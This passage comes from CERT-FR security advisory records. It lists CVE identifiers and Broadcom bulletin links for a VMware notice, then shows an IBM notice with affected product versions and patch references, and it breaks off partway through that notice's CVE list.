"name": "CVE-2025-38410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38410"
},
{
"name": "CVE-2025-21790",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21790"
},
{
"name": "CVE-2024-52316",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52316"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2021-39212",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39212"
},
{
"name": "CVE-2024-28182",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28182"
},
{
"name": "CVE-2024-58014",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58014"
},
{
"name": "CVE-2025-21680",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21680"
},
{
"name": "CVE-2025-0167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0167"
},
{
"name": "CVE-2017-12433",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12433"
},
{
"name": "CVE-2025-21924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21924"
},
{
"name": "CVE-2021-3574",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3574"
},
{
"name": "CVE-2023-6597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6597"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
},
{
"name": "CVE-2022-21541",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21541"
},
{
"name": "CVE-2025-22227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22227"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-27221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27221"
},
{
"name": "CVE-2024-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
},
{
"name": "CVE-2024-58006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58006"
},
{
"name": "CVE-2025-21710",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21710"
},
{
"name": "CVE-2022-21360",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21360"
},
{
"name": "CVE-2025-22088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22088"
},
{
"name": "CVE-2025-38460",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38460"
},
{
"name": "CVE-2022-27664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27664"
},
{
"name": "CVE-2022-25858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25858"
},
{
"name": "CVE-2022-21296",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21296"
},
{
"name": "CVE-2022-48303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48303"
},
{
"name": "CVE-2025-38345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38345"
},
{
"name": "CVE-2022-21540",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21540"
},
{
"name": "CVE-2025-21815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21815"
},
{
"name": "CVE-2025-50083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50083"
},
{
"name": "CVE-2024-37371",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37371"
},
{
"name": "CVE-2017-6836",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6836"
},
{
"name": "CVE-2021-3500",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3500"
},
{
"name": "CVE-2022-25310",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25310"
},
{
"name": "CVE-2023-38545",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38545"
},
{
"name": "CVE-2021-43618",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43618"
},
{
"name": "CVE-2021-20251",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20251"
},
{
"name": "CVE-2025-21669",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21669"
},
{
"name": "CVE-2016-1000027",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000027"
},
{
"name": "CVE-2021-33621",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33621"
},
{
"name": "CVE-2025-57807",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57807"
},
{
"name": "CVE-2025-38231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38231"
},
{
"name": "CVE-2022-26488",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26488"
},
{
"name": "CVE-2025-21716",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21716"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2025-3777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3777"
},
{
"name": "CVE-2025-21964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21964"
},
{
"name": "CVE-2024-0567",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0567"
},
{
"name": "CVE-2018-18384",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18384"
},
{
"name": "CVE-2024-58080",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58080"
},
{
"name": "CVE-2025-21744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21744"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
},
{
"name": "CVE-2023-32665",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32665"
},
{
"name": "CVE-2025-31498",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31498"
},
{
"name": "CVE-2022-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30698"
},
{
"name": "CVE-2023-31438",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31438"
},
{
"name": "CVE-2024-57986",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57986"
},
{
"name": "CVE-2021-37750",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37750"
},
{
"name": "CVE-2025-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3576"
},
{
"name": "CVE-2023-23916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23916"
},
{
"name": "CVE-2021-20244",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20244"
},
{
"name": "CVE-2025-38181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38181"
},
{
"name": "CVE-2025-21835",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21835"
},
{
"name": "CVE-2025-38391",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38391"
},
{
"name": "CVE-2025-11411",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11411"
},
{
"name": "CVE-2020-14577",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14577"
},
{
"name": "CVE-2022-3570",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3570"
},
{
"name": "CVE-2016-9844",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-9844"
},
{
"name": "CVE-2019-13136",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-13136"
},
{
"name": "CVE-2025-49014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49014"
},
{
"name": "CVE-2021-36222",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36222"
},
{
"name": "CVE-2021-3941",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3941"
},
{
"name": "CVE-2022-0561",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0561"
},
{
"name": "CVE-2024-6923",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6923"
},
{
"name": "CVE-2025-21811",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21811"
},
{
"name": "CVE-2024-8088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
},
{
"name": "CVE-2025-11226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11226"
}
],
"initial_release_date": "2025-11-06T00:00:00",
"last_revision_date": "2025-11-06T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0969",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-11-06T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36320",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36320"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36423",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36423"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2022-19",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36364"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36351"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36424",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36424"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36412",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36412"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36388",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36388"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36426",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36426"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36411",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36411"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36357",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36357"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36408",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36408"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36349",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36349"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36414",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36414"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36397",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36397"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36389",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36389"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36398",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36398"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36380",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36380"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-41",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36407"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36362",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36362"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36413",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36413"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36384",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36384"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36379",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36379"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36400",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36400"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36377",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36377"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36368",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36368"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36418",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36418"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36420",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36420"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36391",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36391"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36392",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36392"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36353",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36353"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-14",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36356"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36422",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36422"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36381",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36381"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36421",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36421"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36416",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36416"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-86",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36415"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36403",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36403"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36347",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36347"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36383",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36383"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36410",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36410"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36352",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36352"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36394",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36394"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36354",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36354"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36399",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36399"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36350"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36419",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36419"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-85",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36401"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2022-19",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36365"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36405",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36405"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2018-27",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36367"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36395",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36395"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36387",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36387"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36363",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36363"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36385",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36385"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36409",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36409"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36359"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36348",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36348"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36386",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36386"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36417",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36417"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36425",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36425"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2018-27",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36366"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-44",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36360"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36355",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36355"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36358"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36396",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36396"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36378",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36378"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36382",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36382"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36404",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36404"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-44",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36361"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36402",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36402"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36393",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36393"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36406",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36406"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36390",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36390"
}
]
}
CERTFR-2025-AVI-0106
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Cognos Analytics | Cognos Analytics versions 12.x antérieures à 12.0.4 IF2 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 FP5 | ||
| IBM | Security QRadar EDR | Security QRadar EDR versions 3.12.x antérieures à 3.12.15 | ||
| IBM | Db2 | IBM Db2 on Cloud Pak for Data et Db2 Warehouse on Cloud Pak for Data versions 3.5 à 4.8 antérieures à v4.8.8 | ||
| IBM | Security QRadar SIEM | QRadar SIEM versions 7.5.0 antérieures à 7.5.0 UP11 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Cognos Analytics versions 12.x ant\u00e9rieures \u00e0 12.0.4 IF2",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 FP5",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Security QRadar EDR versions 3.12.x ant\u00e9rieures \u00e0 3.12.15",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Db2 on Cloud Pak for Data et Db2 Warehouse on Cloud Pak for Data versions 3.5 \u00e0 4.8 ant\u00e9rieures \u00e0 v4.8.8",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.0 ant\u00e9rieures \u00e0 7.5.0 UP11",
"product": {
"name": "Security QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-29483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29483"
},
{
"name": "CVE-2023-7104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7104"
},
{
"name": "CVE-2020-21469",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21469"
},
{
"name": "CVE-2024-45020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45020"
},
{
"name": "CVE-2024-46826",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46826"
},
{
"name": "CVE-2024-42070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42070"
},
{
"name": "CVE-2023-51714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51714"
},
{
"name": "CVE-2021-47366",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47366"
},
{
"name": "CVE-2024-41093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41093"
},
{
"name": "CVE-2021-21409",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21409"
},
{
"name": "CVE-2024-36361",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36361"
},
{
"name": "CVE-2024-35939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35939"
},
{
"name": "CVE-2024-41009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41009"
},
{
"name": "CVE-2024-29041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29041"
},
{
"name": "CVE-2019-9641",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9641"
},
{
"name": "CVE-2022-21426",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21426"
},
{
"name": "CVE-2024-39503",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39503"
},
{
"name": "CVE-2024-50268",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50268"
},
{
"name": "CVE-2024-42292",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42292"
},
{
"name": "CVE-2024-28849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28849"
},
{
"name": "CVE-2016-2193",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-2193"
},
{
"name": "CVE-2024-42284",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42284"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-26961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26961"
},
{
"name": "CVE-2024-38608",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38608"
},
{
"name": "CVE-2024-50275",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50275"
},
{
"name": "CVE-2024-49352",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49352"
},
{
"name": "CVE-2023-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37920"
},
{
"name": "CVE-2024-40924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40924"
},
{
"name": "CVE-2024-22353",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22353"
},
{
"name": "CVE-2020-20703",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-20703"
},
{
"name": "CVE-2024-50125",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50125"
},
{
"name": "CVE-2022-48968",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48968"
},
{
"name": "CVE-2024-47715",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47715"
},
{
"name": "CVE-2024-26976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26976"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-50267",
